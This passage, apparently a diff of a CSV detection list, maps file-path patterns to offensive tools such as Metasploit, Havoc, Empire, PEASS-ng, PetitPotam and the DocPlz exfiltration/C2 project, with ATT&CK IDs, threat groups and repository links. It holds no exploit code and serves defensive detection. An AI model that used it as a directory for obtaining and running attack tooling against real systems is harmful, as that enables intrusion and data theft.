Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" -"*/payloads/util*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/payloadtests.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*/payloads/DllLdr/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/payloads/payloads.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*/payloads/util*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/payloadtests.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" "*/pcanywhere-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/pcworx-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/PDF_Payload/script.txt*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z" -"*/pe/dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/pe/dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/PE/InjectPE.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" -"*/pe_to_shellcode*","offensive_tool_keyword","pe_to_shellcode","Converts PE into a shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/hasherezade/pe_to_shellcode","1","1","N/A","N/A","10","2007","402","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z" +"*/pe_to_shellcode*","offensive_tool_keyword","pe_to_shellcode","Converts PE into a shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/hasherezade/pe_to_shellcode","1","1","N/A","N/A","10","2008","402","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z" "*/pe2shc.exe*","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" -"*/pe2shc/*","offensive_tool_keyword","pe_to_shellcode","Converts PE into a shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation 
tools","https://github.com/hasherezade/pe_to_shellcode","1","1","N/A","N/A","10","2007","402","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z" -"*/PEASS-ng.git*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" -"*/PEASS-ng/*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" +"*/pe2shc/*","offensive_tool_keyword","pe_to_shellcode","Converts PE into a shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/hasherezade/pe_to_shellcode","1","1","N/A","N/A","10","2008","402","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z" +"*/PEASS-ng.git*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*/PEASS-ng/*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" "*/PeerToPeerService.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*/peinjector*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/peinjector.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/peinjector*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/peinjector.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/pentest*","offensive_tool_keyword","_","pentest keyword detection. detect potential pentesters using this keyword in file name. repository or command line","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/PE-Obfuscator*","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","2","196","38","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" "*/perf_swevent64*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*/persist.tpl*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - 
TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" -"*/PersistBOF/*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","222","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" -"*/Persistence.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*/PersistBOF/*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 
T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*/Persistence.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" "*/Persistence.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" -"*/persistence/*.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1133","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*/persistence/*.psm1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1134","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/persistence/*.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1133","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/persistence/*.psm1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1134","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/Persistence/InstallUtil.*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*/persistence2.rc*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation 
tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*/peterspbr/dirty-pipe-otw*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/peterspbr/dirty-pipe-otw","1","1","N/A","N/A","1","1","0","2022-03-10T03:42:15Z","2022-03-09T17:21:17Z" -"*/PetitPotam.git*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1590","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" +"*/PetitPotam.git*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1591","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" +"*/petitpotam.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/PEzor.cna*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "*/PEzor.git*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 